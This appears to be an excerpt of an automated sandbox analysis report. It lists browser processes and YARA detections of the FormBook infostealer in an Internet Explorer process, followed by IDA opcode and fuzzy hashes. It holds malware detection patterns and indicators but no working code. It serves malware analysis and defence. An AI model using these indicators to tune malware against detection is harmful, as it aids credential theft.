                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:22
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:3
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:23
                                Start time:02:42:36
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5640 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:27
                                Start time:02:42:40
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                Imagebase:0xb80000
                                File size:828'368 bytes
                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:28
                                Start time:02:42:41
                                Start date:27/05/2024
                                Path:C:\Program Files\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                                Imagebase:0x7ff7aea80000
                                File size:834'512 bytes
                                MD5 hash:CFE2E6942AC1B72981B3105E22D3224E
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:29
                                Start time:02:42:41
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9478 /prefetch:2
                                Imagebase:0xb80000
                                File size:828'368 bytes
                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Has exited:false

                                Target ID:30
                                Start time:02:42:42
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
                                Imagebase:0x7ff7d2330000
                                File size:1'255'976 bytes
                                MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:31
                                Start time:02:42:42
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
                                Imagebase:0x7ff7d2330000
                                File size:1'255'976 bytes
                                MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:32
                                Start time:02:42:45
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:3675436 /prefetch:2
                                Imagebase:0xb80000
                                File size:828'368 bytes
                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:33
                                Start time:02:42:54
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:34
                                Start time:02:42:55
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=820 --field-trial-handle=2108,i,1526023711057746171,13780567962873584071,262144 /prefetch:3
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:35
                                Start time:02:43:02
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:36
                                Start time:02:43:03
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=604 --field-trial-handle=1524,i,17359145505352969996,18071872945210523971,262144 /prefetch:3
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 907200b8ab14ab939efd9a3d5aaff73c0d8714f4122310ca9fc5cad6e82e1adc
                                  • Instruction ID: a9065ff06a6852fca74134ad331ca3a65fc5c9ac1204e4a61911a29c5873baec
                                  • Opcode Fuzzy Hash: 907200b8ab14ab939efd9a3d5aaff73c0d8714f4122310ca9fc5cad6e82e1adc
                                  • Instruction Fuzzy Hash: 5A428330719E0A4FDBA8EB58D4A1A71B3E1FFA8315B15476EC04EC3996DE35F9428780
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c94769c765f193b6e79ad851ffefdfc001e0c803f656d3fb2b6064ced4e48084
                                  • Instruction ID: bd9b0006a2bffa9ac909ebdad3c5025a21bfdd521d7e3fb44622546fec277b44
                                  • Opcode Fuzzy Hash: c94769c765f193b6e79ad851ffefdfc001e0c803f656d3fb2b6064ced4e48084
                                  • Instruction Fuzzy Hash: A3423F30A19A0A8FDBA8DB58C4A5B7573E1FF98300F1142BED44ED72A5DE35E981CB41
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b870cb891389125a1530a093ced176d403b982db4cdc05272dece5dba8ba2e2d
                                  • Instruction ID: 4e37a62ad3038d48c191e71da219a460575424194b58b93964f287823a47138d
                                  • Opcode Fuzzy Hash: b870cb891389125a1530a093ced176d403b982db4cdc05272dece5dba8ba2e2d
                                  • Instruction Fuzzy Hash: 50029511B29A5D4FEBA8EB7C88717B966C2EF9C700F1541B9E01DC33E6DD28AC418791
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a185a3026ec950b91c8240ab01527459e22d3a49cc801de96b74c29e8274e9ab
                                  • Instruction ID: d4a7f6aba5a161530be375ed7487ec0bbe8f806708e3b3cd5b383184930243fa
                                  • Opcode Fuzzy Hash: a185a3026ec950b91c8240ab01527459e22d3a49cc801de96b74c29e8274e9ab
                                  • Instruction Fuzzy Hash: 5AD16932B1DA5A4FEB5CEB7C84A55B537D1EFA9300B1500BED04ECB2E2DD25AD428780
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16bd819e48adc9363e3af12c4b975932292f787028b36227b24ddf2ffaff95e6
                                  • Instruction ID: 3922d5baaef0706b21f59a009884e2c349284e328b763c9d85b3a5f6f43fd95c
                                  • Opcode Fuzzy Hash: 16bd819e48adc9363e3af12c4b975932292f787028b36227b24ddf2ffaff95e6
                                  • Instruction Fuzzy Hash: 78B16A3271DA854FE75DAB7888655B53BD1EF6A344B0A40BFD049CB1F3ED14AD028780
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: _$d
                                  • API String ID: 0-597095544
                                  • Opcode ID: 685f2e7bb78c33bc828ea0457f516fbb0414395f3f6ab92b0f8c87778bb29c7a
                                  • Instruction ID: 5036eb4d6c075ad74a99cc2ae3443e0f68b23032998e41f3ec88d80ccb70310b
                                  • Opcode Fuzzy Hash: 685f2e7bb78c33bc828ea0457f516fbb0414395f3f6ab92b0f8c87778bb29c7a
                                  • Instruction Fuzzy Hash: 0F02C270618B4A8FD768EF18D491A75B3E1FF98310F14467ED09EC3696DA35B882CB81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 1$m
                                  • API String ID: 0-402893558
                                  • Opcode ID: 28bea6ed6cc45c21d907903bbf3b4bb04cd3f6680d42966dbc92ad4af38ac472
                                  • Instruction ID: 4d6e634d1389cbc0af23cb0144cef27946f8807fce4d757e90b48cbe262e2eb3
                                  • Opcode Fuzzy Hash: 28bea6ed6cc45c21d907903bbf3b4bb04cd3f6680d42966dbc92ad4af38ac472
                                  • Instruction Fuzzy Hash: 33E1F7B1A197494FE799EB6888657A577E1FF59300F1001FEE05DC71E2DE346A82CB01
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: +L_^$-L_^
                                  • API String ID: 0-3589249088
                                  • Opcode ID: 4152a20d5f99b25ff38a0e8a7310e33c16810d9025a189eca3ce98e547a0ab22
                                  • Instruction ID: 313d50555d7cb05b74a5949aaf441a98a2c6e9f6bb5a3bc96eecc867b5194c21
                                  • Opcode Fuzzy Hash: 4152a20d5f99b25ff38a0e8a7310e33c16810d9025a189eca3ce98e547a0ab22
                                  • Instruction Fuzzy Hash: 0391A063B1E7E60BE32567BCBC251F93B90EF45364B0841FBD0988B0EBED55650682C1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: =L_^$L_^
                                  • API String ID: 0-1704606949
                                  • Opcode ID: 8e3c07192a8ed9218abbd3d1e3ddc62330905e8a7af9fc08c604a0ebecd7ffe6
                                  • Instruction ID: 893bd6fa2855330715da3d0795b1f2da231c3ad5817bb138a38d149b78d25937
                                  • Opcode Fuzzy Hash: 8e3c07192a8ed9218abbd3d1e3ddc62330905e8a7af9fc08c604a0ebecd7ffe6
                                  • Instruction Fuzzy Hash: 533159B7B195264BE32926ADBC662FD37C0EF44368F0401BBD199C7193EE14A94996C0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "sx
                                  • API String ID: 0-2205791524
                                  • Opcode ID: a513ad83de31a0c1cfafb31e9887cb5cc9b4a635e42b5cdcb8e2e16048426272
                                  • Instruction ID: 60bbbd5662567527ccdfb67c935eb6001c0a9191bf48af6b5a1fef5cec2471c5
                                  • Opcode Fuzzy Hash: a513ad83de31a0c1cfafb31e9887cb5cc9b4a635e42b5cdcb8e2e16048426272
                                  • Instruction Fuzzy Hash: 3E221731709A1E8FE764EB68D464BE57791EF98314F1542BBC04DCB1D2DA29F886CB80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1916155425.00007FFD9B9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b9c0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: A
                                  • API String ID: 0-3554254475
                                  • Opcode ID: 5a7662ce1edfdc8ed4688ba609d53c7cfd258e041b0f41bc89c8e67b8dea3333
                                  • Instruction ID: 5c1aa638bb3323070ece599dba2a8d0475aca619deec4715643f2bad4b6a34b6
                                  • Opcode Fuzzy Hash: 5a7662ce1edfdc8ed4688ba609d53c7cfd258e041b0f41bc89c8e67b8dea3333
                                  • Instruction Fuzzy Hash: 48F1BA7291E78A4FEB65EB28C8655B47BE0FF55700F1601BED08DCB0A3DB246909CB81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CL_L
                                  • API String ID: 0-2469138507
                                  • Opcode ID: 12b72b81f5f695b49b77f13fb59a6d089c8d45303683f0a1f62e18edb5c8c037
                                  • Instruction ID: 65a0439d0ca9c2da596ff5af014c793a49b78217e4b6daf494dc79e22d5574d4
                                  • Opcode Fuzzy Hash: 12b72b81f5f695b49b77f13fb59a6d089c8d45303683f0a1f62e18edb5c8c037
                                  • Instruction Fuzzy Hash: 1391667161EB494FE768EB5898968B577E0EB59320B1501BFD48AC32B3D935B803C381
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: +L_^
                                  • API String ID: 0-2651307759
                                  • Opcode ID: e9b5628de14e845734b3d29dde6031c805d175c863ed61d4cf2a9552f4d6918a
                                  • Instruction ID: 4ca8e710bd4baf613de4608ecf9c544d5963e366911aa24eac9afcdd84587119
                                  • Opcode Fuzzy Hash: e9b5628de14e845734b3d29dde6031c805d175c863ed61d4cf2a9552f4d6918a
                                  • Instruction Fuzzy Hash: EE815B53B1F7E60BE32567BC7C251F93B90EF463A4B0841FBD4988A0EBEC55690682C1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: +L_^
                                  • API String ID: 0-2651307759
                                  • Opcode ID: 958214853637e252b105e25872fdd803c70c2e8607c6a92f8ed06fafe06b0847
                                  • Instruction ID: 0c8c6899b7bdfef1f2deb461eecc24512599c943958d83ccf5a58fac17900f20
                                  • Opcode Fuzzy Hash: 958214853637e252b105e25872fdd803c70c2e8607c6a92f8ed06fafe06b0847
                                  • Instruction Fuzzy Hash: 6A815A53B1F7E60BE32567BC7C251B93B90EF463A4B0941FBD4988B0EBEC55690682C1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: YH_L
                                  • API String ID: 0-2877362028
                                  • Opcode ID: ef5ecb07b75cd9c7217462729da75914093e7f85e1da18870707129a4a4cf31c
                                  • Instruction ID: 991cdd13aeaf19cab36cd02fbbddcdf90b2077e27afdd2bda27f2b7af23fdc33
                                  • Opcode Fuzzy Hash: ef5ecb07b75cd9c7217462729da75914093e7f85e1da18870707129a4a4cf31c
                                  • Instruction Fuzzy Hash: 91619131B1DA0E4FDB78EB98D4A897577D0EB99310B1505BAD05DC32A2D925ED828B80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: vK_L
                                  • API String ID: 0-1368788573
                                  • Opcode ID: d4e438c0509cc90b8c0c1770bdd9a1889ae4dbc8856333a6d484ef6e27c2c763
                                  • Instruction ID: d3d3a24308a839e72ff81af7730cb3d2fd0f944a5c810ac319931a7dc9f519b9
                                  • Opcode Fuzzy Hash: d4e438c0509cc90b8c0c1770bdd9a1889ae4dbc8856333a6d484ef6e27c2c763
                                  • Instruction Fuzzy Hash: 6551063270DE1D5FE7A8EA3C986966477D1EB9D35071501FBE00DCB2A2ED21AC468780
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: hI_H
                                  • API String ID: 0-3854122630
                                  • Opcode ID: f537054d7a49df1109f648c449cc6b9961fde651ce11398143d3f7d52f8541d1
                                  • Instruction ID: 6b79d8317ae49a50cc434f4b73805aac36177ddfdf94a561915a80b85a15407e
                                  • Opcode Fuzzy Hash: f537054d7a49df1109f648c449cc6b9961fde651ce11398143d3f7d52f8541d1
                                  • Instruction Fuzzy Hash: 14519571A18F494FD76CEB288455AB2B7D1EFA8350F0446BFD09EC32A6EE34B5028741
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: yK_L
                                  • API String ID: 0-167058955
                                  • Opcode ID: 654a7f2aa78e885ade1e72c954dda5b955aefc622cca92e00b9949bbd05de8ea
                                  • Instruction ID: 674cc705a05e79e1c4138f83aa482a5e6a64f12cef2ed329ff2783fbbee7fcfc
                                  • Opcode Fuzzy Hash: 654a7f2aa78e885ade1e72c954dda5b955aefc622cca92e00b9949bbd05de8ea
                                  • Instruction Fuzzy Hash: FCF0D622B1DD2E0BD67CA75C74211A9B2C1EB5C31070001AED45EC32DBDD24AD4246C5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: zK_L
                                  • API String ID: 0-457224677
                                  • Opcode ID: fc1c7d56f09b1008295e031906ea28bc765fc0367a485eb4d2c3f54a72532ed2
                                  • Instruction ID: 4f5f8b8825acb02d179ccf5a158f1cc91e3c3aa984412f53191f6e119309e9ec
                                  • Opcode Fuzzy Hash: fc1c7d56f09b1008295e031906ea28bc765fc0367a485eb4d2c3f54a72532ed2
                                  • Instruction Fuzzy Hash: 1AF08122B1DD2E0BD67CAA6C74611B9A3C1EB5C36075041AFE45EC329BED28AD4246C5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: {K_L
                                  • API String ID: 0-2751256192
                                  • Opcode ID: b7d59f5fb9a4a28bc42ddabe78735c7c115e247c26ff3fb2678ce0bff18542c5
                                  • Instruction ID: 915462607b7f58fbe8d775726f50afd02ae936a27ca40980ef488e975ab787df
                                  • Opcode Fuzzy Hash: b7d59f5fb9a4a28bc42ddabe78735c7c115e247c26ff3fb2678ce0bff18542c5
                                  • Instruction Fuzzy Hash: 2EF0AD22B0DE2E0AD67CAA5870601B9A2C1EB5C32071001AED45EC329BDD28A94246C5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a076e595de43e390dfe2e4b2b5b32fac8a9559e5622f7b0c993e4ffe96799dfc
                                  • Instruction ID: b41186a2e88c315d37b81c2b080e174ae7f8a37c3f5c128187502cd5166e1893
                                  • Opcode Fuzzy Hash: a076e595de43e390dfe2e4b2b5b32fac8a9559e5622f7b0c993e4ffe96799dfc
                                  • Instruction Fuzzy Hash: D85215B2B0EE4E4FEBA9EB6C947167437D2EF98340B0941BBD04DC71A6DD25AD068740
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 225a81548a659e360d5023fc82ccb9d65576b9e39c555df47bc3d725d5919fea
                                  • Instruction ID: 6afdac2b054eb996c1c7bf6133a633e8063202feeee1022242b7234dd0ccd751
                                  • Opcode Fuzzy Hash: 225a81548a659e360d5023fc82ccb9d65576b9e39c555df47bc3d725d5919fea
                                  • Instruction Fuzzy Hash: CB429B7070990D8FEBA8EF6C94A4B7577E1FF58300F0501BAE44DCB2A6DA24ED458B81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb2502e867af20befe43169bea7847df01eb5615b9c3a46aa68f1a10e9ea3b95
                                  • Instruction ID: d738684818cfdc34f6afb5055d49034f17a4698f5d7fee094128cc2d94f6b70d
                                  • Opcode Fuzzy Hash: fb2502e867af20befe43169bea7847df01eb5615b9c3a46aa68f1a10e9ea3b95
                                  • Instruction Fuzzy Hash: CA229D6171994E4FEBA4FB2C9468A7477D2EFA934070640FBE44DC72AADE24EC468740
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 225097bb61c3a084206510607f292c51eb185028bfab6d69ff5fcc7eafe9ca1a
                                  • Instruction ID: b0d403611e8c42121aad9170e1cb559ba6c793ec65d5fb37c5132d1edd9b374a
                                  • Opcode Fuzzy Hash: 225097bb61c3a084206510607f292c51eb185028bfab6d69ff5fcc7eafe9ca1a
